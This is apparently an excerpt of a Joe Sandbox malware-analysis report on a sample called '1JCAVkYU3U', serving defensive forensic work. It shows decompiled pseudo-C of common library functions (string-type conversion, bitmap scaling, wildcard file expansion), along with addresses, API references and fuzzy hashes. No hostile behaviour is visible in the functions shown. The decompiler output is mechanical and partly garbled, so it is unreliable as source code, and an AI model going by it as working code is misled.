0x00b611c9
0x00b611cc
0x00b611cf
0x00b611d7
0x00b611e0
0x00b611e6
0x00b611ec
0x00b611ef
0x00b611f2
0x00b611f9
0x00b61200
0x00b61203
0x00b6120d
0x00b61205
0x00b61205
0x00b61205
0x00b61213
0x00b61217
0x00b61219
0x00b61224
0x00b61228
0x00b6122e
0x00b61231
0x00b6123b
0x00b61233
0x00b61233
0x00b61233
0x00b61241
0x00b61241
0x00b61243
0x00b61243
0x00b6124c

APIs

_wcslen.LIBCMT ref: 00B6112B
_wcslen.LIBCMT ref: 00B61153
_wcslen.LIBCMT ref: 00B61182
_wcslen.LIBCMT ref: 00B611A9

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: e4a669a7d5b60ce1445eb74dfc0256a3ac0b785e05e70f57eb5f282aebdff9d7
Instruction ID: 941c057643fdaae48e48e1be42f479ee3c0648cf90cb354687e5c28ebd593c7e
Opcode Fuzzy Hash: e4a669a7d5b60ce1445eb74dfc0256a3ac0b785e05e70f57eb5f282aebdff9d7
Instruction Fuzzy Hash: 5741E3719006299BCB21AF68CC1AAEE7BF8EF04711F04406AF945F7251DE34EE448BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B8C988 Relevance: 6.1, APIs: 4, Instructions: 110
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00B8C988(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t54;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t66;
				short* _t67;
				signed int _t68;
				short* _t69;

				_t65 = __edx;
				_t34 =  *0xb9e7ac; // 0x37e7c6f
				_v8 = _t34 ^ _t68;
				E00B84636(_t55,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x2de85006
					_t54 =  *_t6;
					_t57 = _t54;
					_a24 = _t54;
				}
				_t66 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00B7FBBC(_t66, _t55, _v8 ^ _t68, _t65, _t66, _t67);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t67 = 0;
					L11:
					if(_t67 != 0) {
						E00B7FFF0(_t66, _t67, _t66, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t67, _v12);
						if(_t46 != 0) {
							_t66 = GetStringTypeW(_a8, _t67, _t46, _a20);
						}
					}
					L14:
					E00B8ABC3(_t67);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t67 = E00B88E06(_t63, _t48 & _t63);
					if(_t67 == 0) {
						goto L14;
					}
					 *_t67 = 0xdddd;
					L9:
					_t67 =  &(_t67[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00B92010(_t48 & _t63);
				_t67 = _t69;
				if(_t67 == 0) {
					goto L14;
				}
				 *_t67 = 0xcccc;
				goto L9;
			}

0x00b8c988
0x00b8c990
0x00b8c997
0x00b8c9a3
0x00b8c9a8
0x00b8c9ad
0x00b8c9b2
0x00b8c9b2
0x00b8c9b5
0x00b8c9b7
0x00b8c9b7
0x00b8c9bc
0x00b8c9d5
0x00b8c9db
0x00b8c9e0
0x00b8ca7f
0x00b8ca83
0x00b8ca88
0x00b8ca88
0x00b8caa4
0x00b8caa4
0x00b8c9e6
0x00b8c9ee
0x00b8c9f2
0x00b8ca3e
0x00b8ca40
0x00b8ca42
0x00b8ca47
0x00b8ca5e
0x00b8ca66
0x00b8ca76
0x00b8ca76
0x00b8ca66
0x00b8ca78
0x00b8ca79
0x00000000
0x00b8ca7e
0x00b8c9f9
0x00b8c9fb
0x00b8c9fd
0x00b8ca05
0x00b8ca22
0x00b8ca2c
0x00b8ca31
0x00000000
0x00000000
0x00b8ca33
0x00b8ca39
0x00b8ca39
0x00000000
0x00b8ca39
0x00b8ca09
0x00b8ca0d
0x00b8ca12
0x00b8ca16
0x00000000
0x00000000
0x00b8ca18
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00B847C6,00000000,00000000,00B857FB,?,00B857FB,?,00000001,00B847C6,2DE85006,00000001,00B857FB,00B857FB), ref: 00B8C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B8CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B8CA70
__freea.LIBCMT ref: 00B8CA79

Part of subcall function 00B88E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B84286,?,0000015D,?,?,?,?,00B85762,000000FF,00000000,?,?), ref: 00B88E38

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: ea38d9e7125e23c0aa021336773632d5af9a32e3ce14584ac5e8c1d329c5bac9
Instruction ID: 3335098e9594657da9c4a9ecb8bfdfd6cf7374953a387d23960ad98ab6fe36b2
Opcode Fuzzy Hash: ea38d9e7125e23c0aa021336773632d5af9a32e3ce14584ac5e8c1d329c5bac9
Instruction Fuzzy Hash: BA31A072A0021AABDF29EF64DC81DBE7BE5EB01710B1441A9FC14E7264EB35DD50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B7A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00B7A80C(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				short _v122;
				short _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				char _v140;
				intOrPtr* _v144;
				char _v156;
				intOrPtr* _v164;
				intOrPtr* _v168;
				intOrPtr _v176;
				char _v180;
				char _v184;
				intOrPtr* _v196;
				intOrPtr _v212;
				signed int _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				intOrPtr _v232;
				intOrPtr* _v236;
				intOrPtr* _v244;
				void* _v256;
				void* _v260;
				intOrPtr* _v268;
				intOrPtr* _t94;
				void* _t96;
				intOrPtr* _t97;
				signed int _t100;
				intOrPtr* _t103;
				intOrPtr* _t106;
				short _t114;
				intOrPtr _t117;
				intOrPtr* _t118;
				intOrPtr* _t121;
				intOrPtr* _t124;
				intOrPtr* _t130;
				signed int _t133;
				intOrPtr* _t139;
				intOrPtr* _t143;
				void* _t148;
				signed int _t150;
				intOrPtr* _t156;
				intOrPtr* _t166;
				intOrPtr* _t169;
				char _t180;
				void* _t182;
				intOrPtr* _t186;
				signed int _t198;
				long long* _t202;
				long long _t204;

				_t204 = __fp0;
				_t202 =  &_v112;
				if(E00B7A699() != 0) {
					_t148 = _a4;
					GetObjectW(_t148, 0x18,  &_v68);
					_t150 = _v4;
					asm("cdq");
					_t198 = _v72 * _t150 / _v76;
					if(_t198 >= _v0) {
						_t198 = _v0;
					}
					if(_t150 != _v76 || _t198 != _v72) {
						_t180 = 0;
						_push( &_v124);
						_push(0xb94754);
						_push(1);
						_push(0);
						_push(0xb9555c);
						if( *0xbc3188() >= 0) {
							_t94 = _v144;
							 *0xb93278(_t94, _t148, 0, 2,  &_v140, _t182);
							_t96 =  *((intOrPtr*)( *_t94 + 0x54))();
							_t97 = _v164;
							if(_t96 < 0) {
								L14:
								 *0xb93278(_t97);
								 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 8))))();
								L21:
								_t100 =  *0xbc30e4(_t148, _t180, _t180, _t180, _t180);
								L22:
								goto L23;
							}
							_v156 = 0;
							_t186 =  *((intOrPtr*)( *_t97 + 0x28));
							_t156 = _t186;
							 *0xb93278(_t97,  &_v156);
							if( *_t186() < 0) {
								L13:
								_t103 = _v168;
								 *0xb93278(_t103);
								 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))();
								_t97 = _v176;
								goto L14;
							}
							_t106 = _v164;
							asm("fldz");
							 *_t202 = _t204;
							 *0xb93278(_t106, _v168, 0xb9556c, 0, 0, _t156, _t156, 0);
							if( *((intOrPtr*)( *_t106 + 0x20))() >= 0) {
								_v132 = _v84;
								_v116 = 0;
								_v128 =  ~_t198;
								_v112 = 0;
								_v124 = 1;
								_t114 = 0x20;
								_v122 = _t114;
								_v108 = 0;
								_v104 = 0;
								_v100 = 0;
								_v96 = 0;
								_v136 = 0x28;
								_v120 = 0;
								_v184 = 0;
								_t117 =  *0xbc3058(0,  &_v136, 0,  &_v180, 0, 0);
								_v212 = _t117;
								if(_t117 != 0) {
									_t166 = _v228;
									 *0xb93278(_t166,  &_v216);
									 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x2c))))();
									_t130 = _v224;
									 *0xb93278(_t130, _v232, _v116, _t198, 3);
									 *((intOrPtr*)( *_t130 + 0x20))();
									_t133 = _v136;
									_t169 = _v244;
									_v216 = _t198;
									_v220 = _t133;
									_v228 = 0;
									_v224 = 0;
									 *0xb93278(_t169,  &_v228, _t133 << 2, _t198 * _t133 << 2, _v232);
									if( *((intOrPtr*)( *_t169 + 0x1c))() < 0) {
										DeleteObject(_v260);
									} else {
										_v256 = _v260;
									}
									_t139 = _v268;
									 *0xb93278(_t139);
									 *((intOrPtr*)( *((intOrPtr*)( *_t139 + 8))))();
								}
								_t118 = _v224;
								 *0xb93278(_t118);
								 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 8))))();
								_t121 = _v224;
								 *0xb93278(_t121);
								 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))();
								_t124 = _v236;
								 *0xb93278(_t124);
								 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))();
								_t100 = _v220;
								if(_t100 != 0) {
									goto L22;
								} else {
									goto L21;
								}
							}
							_t143 = _v196;
							 *0xb93278(_t143);
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 8))))();
							goto L13;
						}
						goto L8;
					} else {
						_t180 = 0;
						L8:
						_t100 =  *0xbc30e4(_t148, _t180, _t180, _t180, _t180);
						L23:
						return _t100;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E00B7AAC9();
			}

0x00b7a80c
0x00b7a80c
0x00b7a816
0x00b7a82f
0x00b7a83c
0x00b7a846
0x00b7a850
0x00b7a855
0x00b7a85e
0x00b7a860
0x00b7a860
0x00b7a86c
0x00b7a87c
0x00b7a87e
0x00b7a87f
0x00b7a887
0x00b7a888
0x00b7a889
0x00b7a896
0x00b7a8a8
0x00b7a8bc
0x00b7a8c2
0x00b7a8c7
0x00b7a8cb
0x00b7a940
0x00b7a948
0x00b7a94e
0x00b7aab4
0x00b7aab9
0x00b7aabf
0x00000000
0x00b7aabf
0x00b7a8cd
0x00b7a8d9
0x00b7a8dc
0x00b7a8de
0x00b7a8e8
0x00b7a928
0x00b7a928
0x00b7a934
0x00b7a93a
0x00b7a93c
0x00000000
0x00b7a93c
0x00b7a8ea
0x00b7a8ee
0x00b7a8f5
0x00b7a907
0x00b7a912
0x00b7a95c
0x00b7a964
0x00b7a968
0x00b7a971
0x00b7a975
0x00b7a97a
0x00b7a97d
0x00b7a98c
0x00b7a995
0x00b7a99c
0x00b7a9a3
0x00b7a9aa
0x00b7a9b2
0x00b7a9b6
0x00b7a9ba
0x00b7a9c0
0x00b7a9c6
0x00b7a9cc
0x00b7a9dd
0x00b7a9e3
0x00b7a9e5
0x00b7a9fd
0x00b7aa03
0x00b7aa06
0x00b7aa11
0x00b7aa15
0x00b7aa1c
0x00b7aa23
0x00b7aa27
0x00b7aa3b
0x00b7aa46
0x00b7aa56
0x00b7aa48
0x00b7aa4c
0x00b7aa4c
0x00b7aa5c
0x00b7aa68
0x00b7aa6e
0x00b7aa6e
0x00b7aa70
0x00b7aa7c
0x00b7aa82
0x00b7aa84
0x00b7aa90
0x00b7aa96
0x00b7aa98
0x00b7aaa4
0x00b7aaaa
0x00b7aaac
0x00b7aab2
0x00000000
0x00000000
0x00000000
0x00000000
0x00b7aab2
0x00b7a914
0x00b7a920
0x00b7a926
0x00000000
0x00b7a926
0x00000000
0x00b7a874
0x00b7a874
0x00b7a898
0x00b7a89d
0x00b7aac0
0x00000000
0x00b7aac2
0x00b7a86c
0x00b7a818
0x00b7a81c
0x00b7a820
0x00000000

APIs

Part of subcall function 00B7A699: GetDC.USER32(00000000), ref: 00B7A69D
Part of subcall function 00B7A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B7A6A8
Part of subcall function 00B7A699: ReleaseDC.USER32(00000000,00000000), ref: 00B7A6B3

GetObjectW.GDI32(?,00000018,?), ref: 00B7A83C

Part of subcall function 00B7AAC9: GetDC.USER32(00000000), ref: 00B7AAD2
Part of subcall function 00B7AAC9: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,00B7A829,?,?,?), ref: 00B7AB01
Part of subcall function 00B7AAC9: ReleaseDC.USER32(00000000,?), ref: 00B7AB99

Strings

(, xrefs: 00B7A9AA

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 69aeada10a9ec8c37a3d5ed94217d8850b6bfcdfc24fa7a9bfd2e4d0e8e940f8
Instruction ID: 2c77566e652d1474f4e7c72df98a241aec5e819076a68feee975a4c898a9f71c
Opcode Fuzzy Hash: 69aeada10a9ec8c37a3d5ed94217d8850b6bfcdfc24fa7a9bfd2e4d0e8e940f8
Instruction Fuzzy Hash: 4291D071608354AFD650DF25D984A2BBBE8FFC9B00F00895EF59AD3260DB30A945CF62

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00B8B1B8(signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t136;
				void* _t138;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t150;
				void* _t153;
				CHAR* _t154;
				void* _t155;
				char _t157;
				char _t159;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t164;
				signed int _t166;
				void* _t168;
				intOrPtr* _t169;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t183;
				void* _t192;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t198;
				signed int _t200;
				union _FINDEX_INFO_LEVELS _t201;
				void* _t202;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				void* _t211;
				intOrPtr _t212;
				void* _t213;
				void* _t214;
				signed int _t217;
				void* _t219;
				signed int _t220;
				void* _t221;
				void* _t222;
				void* _t223;
				signed int _t224;
				void* _t225;
				void* _t226;

				_t80 = _a8;
				_t222 = _t221 - 0x20;
				if(_t80 != 0) {
					_t206 = _a4;
					_t159 = 0;
					 *_t80 = 0;
					_t197 = 0;
					_t150 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t206;
					if( *_t206 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t150 - _t197;
						_v8 = _t159;
						_t190 = (_t82 >> 2) + 1;
						__eflags = _t150 - _t197;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t208 =  !_t206 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t208;
						if(_t208 != 0) {
							_t195 = _t197;
							_t157 = _t159;
							do {
								_t183 =  *_t195;
								_t17 = _t183 + 1; // 0x1
								_v8 = _t17;
								do {
									_t142 =  *_t183;
									_t183 = _t183 + 1;
									__eflags = _t142;
								} while (_t142 != 0);
								_t157 = _t157 + 1 + _t183 - _v8;
								_t195 = _t195 + 4;
								_t144 = _v12 + 1;
								_v12 = _t144;
								__eflags = _t144 - _t208;
							} while (_t144 != _t208);
							_t190 = _v16;
							_v8 = _t157;
							_t150 = _v336.cAlternateFileName;
						}
						_t209 = E00B88207(_t190, _v8, 1);
						_t223 = _t222 + 0xc;
						__eflags = _t209;
						if(_t209 != 0) {
							_t87 = _t209 + _v16 * 4;
							_v20 = _t87;
							_t191 = _t87;
							_v16 = _t87;
							__eflags = _t197 - _t150;
							if(_t197 == _t150) {
								L23:
								_t198 = 0;
								__eflags = 0;
								 *_a8 = _t209;
								goto L24;
							} else {
								_t93 = _t209 - _t197;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t162 =  *_t197;
									_v12 = _t162 + 1;
									do {
										_t95 =  *_t162;
										_t162 = _t162 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t163 = _t162 - _v12;
									_t35 = _t163 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00B8F101(_t163, _t191, _v20 - _t191 + _v8,  *_t197);
									_t223 = _t223 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00B89097();
										asm("int3");
										_t219 = _t223;
										_push(_t163);
										_t164 = _v64;
										_t47 = _t164 + 1; // 0x1
										_t192 = _t47;
										do {
											_t103 =  *_t164;
											_t164 = _t164 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t197);
										_t200 = _a8;
										_t166 = _t164 - _t192 + 1;
										_v12 = _t166;
										__eflags = _t166 - (_t103 | 0xffffffff) - _t200;
										if(_t166 <= (_t103 | 0xffffffff) - _t200) {
											_push(_t150);
											_t50 = _t200 + 1; // 0x1
											_t153 = _t50 + _t166;
											_t211 = E00B8B136(_t166, _t153, 1);
											_t168 = _t209;
											__eflags = _t200;
											if(_t200 == 0) {
												L34:
												_push(_v12);
												_t153 = _t153 - _t200;
												_t108 = E00B8F101(_t168, _t211 + _t200, _t153, _v0);
												_t224 = _t223 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t136 = E00B8B587(_a12, _t192, __eflags, _t211);
													E00B88DCC(0);
													_t138 = _t136;
													goto L36;
												}
											} else {
												_push(_t200);
												_t139 = E00B8F101(_t168, _t211, _t153, _a4);
												_t224 = _t223 + 0x10;
												__eflags = _t139;
												if(_t139 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00B89097();
													asm("int3");
													_push(_t219);
													_t220 = _t224;
													_t225 = _t224 - 0x150;
													_t111 =  *0xb9e7ac; // 0x37e7c6f
													_v116 = _t111 ^ _t220;
													_t169 = _v100;
													_push(_t153);
													_t154 = _v104;
													_push(_t211);
													_t212 = _v96;
													_push(_t200);
													_v440 = _t212;
													while(1) {
														__eflags = _t169 - _t154;
														if(_t169 == _t154) {
															break;
														}
														_t113 =  *_t169;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t169 = E00B8F150(_t154, _t169);
																	continue;
																}
															}
														}
														break;
													}
													_t193 =  *_t169;
													__eflags = _t193 - 0x3a;
													if(_t193 != 0x3a) {
														L47:
														_t201 = 0;
														__eflags = _t193 - 0x2f;
														if(_t193 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t193 - 0x5c;
															if(_t193 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t193 - 0x3a;
																if(_t193 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
														E00B7FFF0(_t201,  &_v336, _t201, 0x140);
														_t226 = _t225 + 0xc;
														_t213 = FindFirstFileExA(_t154, _t201,  &_v336, _t201, _t201, _t201);
														_t123 = _v340;
														__eflags = _t213 - 0xffffffff;
														if(_t213 != 0xffffffff) {
															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t173;
															_v348 = _t173 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t154);
																	_push(_t123);
																	L28();
																	_t226 = _t226 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t177 = _v291;
																	__eflags = _t177;
																	if(_t177 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t177 - 0x2e;
																		if(_t177 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t213,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t193 =  *_t123;
															_t178 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t178 - _t131;
															if(_t178 != _t131) {
																E00B86310(_t154, _t193 + _t178 * 4, _t131 - _t178, 4, E00B8B1A0);
															}
														} else {
															_push(_t123);
															_push(_t201);
															_push(_t201);
															_push(_t154);
															L28();
															L54:
															_t201 = _t123;
														}
														__eflags = _t213 - 0xffffffff;
														if(_t213 != 0xffffffff) {
															FindClose(_t213);
														}
														_t124 = _t201;
													} else {
														_t124 =  &(_t154[1]);
														__eflags = _t169 -  &(_t154[1]);
														if(_t169 ==  &(_t154[1])) {
															goto L47;
														} else {
															_push(_t212);
															_push(0);
															_push(0);
															_push(_t154);
															L28();
														}
													}
													L58:
													_pop(_t202);
													_pop(_t214);
													__eflags = _v16 ^ _t220;
													_pop(_t155);
													return E00B7FBBC(_t124, _t155, _v16 ^ _t220, _t193, _t202, _t214);
												} else {
													goto L34;
												}
											}
										} else {
											_t138 = 0xc;
											L36:
											return _t138;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t194 = _v16;
									 *((intOrPtr*)(_v24 + _t197)) = _t194;
									_t197 = _t197 + 4;
									_t191 = _t194 + _v12;
									_v16 = _t194 + _v12;
									__eflags = _t197 - _t150;
								} while (_t197 != _t150);
								goto L23;
							}
						} else {
							_t198 = _t197 | 0xffffffff;
							L24:
							E00B88DCC(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t159;
							_t146 = E00B8F110( *_t206,  &_v8);
							__eflags = _t146;
							if(_t146 != 0) {
								_push( &_v36);
								_push(_t146);
								_push( *_t206);
								L38();
								_t222 = _t222 + 0xc;
							} else {
								_t146 =  &_v36;
								_push(_t146);
								_push(0);
								_push(0);
								_push( *_t206);
								L28();
								_t222 = _t222 + 0x10;
							}
							_t198 = _t146;
							__eflags = _t198;
							if(_t198 != 0) {
								break;
							}
							_t206 = _t206 + 4;
							_t159 = 0;
							__eflags =  *_t206;
							if( *_t206 != 0) {
								continue;
							} else {
								_t150 = _v336.cAlternateFileName;
								_t197 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00B8B562( &_v36);
						_t91 = _t198;
						goto L26;
					}
				} else {
					_t147 = E00B891A8();
					_t217 = 0x16;
					 *_t147 = _t217;
					E00B89087();
					_t91 = _t217;
					L26:
					return _t91;
				}
				L68:
			}

0x00b8b1bd
0x00b8b1c0
0x00b8b1c6
0x00b8b1de
0x00b8b1e1
0x00b8b1e5
0x00b8b1e7
0x00b8b1e9
0x00b8b1eb
0x00b8b1ee
0x00b8b1f1
0x00b8b1f4
0x00b8b1f6
0x00b8b24e
0x00b8b24e
0x00b8b254
0x00b8b256
0x00b8b261
0x00b8b265
0x00b8b267
0x00b8b26a
0x00b8b26e
0x00b8b26e
0x00b8b270
0x00b8b272
0x00b8b274
0x00b8b276
0x00b8b276
0x00b8b278
0x00b8b27b
0x00b8b27e
0x00b8b27e
0x00b8b280
0x00b8b281
0x00b8b281
0x00b8b28c
0x00b8b28e
0x00b8b291
0x00b8b292
0x00b8b295
0x00b8b295
0x00b8b299
0x00b8b29c
0x00b8b29f
0x00b8b29f
0x00b8b2ad
0x00b8b2af
0x00b8b2b2
0x00b8b2b4
0x00b8b2be
0x00b8b2c1
0x00b8b2c4
0x00b8b2c6
0x00b8b2c9
0x00b8b2cb
0x00b8b31b
0x00b8b31e
0x00b8b31e
0x00b8b320
0x00000000
0x00b8b2cd
0x00b8b2cf
0x00b8b2cf
0x00b8b2d1
0x00b8b2d4
0x00b8b2d4
0x00b8b2d9
0x00b8b2dc
0x00b8b2dc
0x00b8b2de
0x00b8b2df
0x00b8b2df
0x00b8b2e3
0x00b8b2e6
0x00b8b2e6
0x00b8b2e9
0x00b8b2ec
0x00b8b2f9
0x00b8b2fe
0x00b8b301
0x00b8b303
0x00b8b33d
0x00b8b33e
0x00b8b33f
0x00b8b340
0x00b8b341
0x00b8b342
0x00b8b347
0x00b8b34b
0x00b8b34d
0x00b8b34e
0x00b8b351
0x00b8b351
0x00b8b354
0x00b8b354
0x00b8b356
0x00b8b357
0x00b8b357
0x00b8b360
0x00b8b361
0x00b8b364
0x00b8b367
0x00b8b36a
0x00b8b36c
0x00b8b373
0x00b8b375
0x00b8b378
0x00b8b382
0x00b8b385
0x00b8b386
0x00b8b388
0x00b8b39c
0x00b8b39c
0x00b8b39f
0x00b8b3a9
0x00b8b3ae
0x00b8b3b1
0x00b8b3b3
0x00000000
0x00b8b3b5
0x00b8b3b9
0x00b8b3c2
0x00b8b3c8
0x00000000
0x00b8b3cb
0x00b8b38a
0x00b8b38a
0x00b8b390
0x00b8b395
0x00b8b398
0x00b8b39a
0x00b8b3d1
0x00b8b3d3
0x00b8b3d4
0x00b8b3d5
0x00b8b3d6
0x00b8b3d7
0x00b8b3d8
0x00b8b3dd
0x00b8b3e0
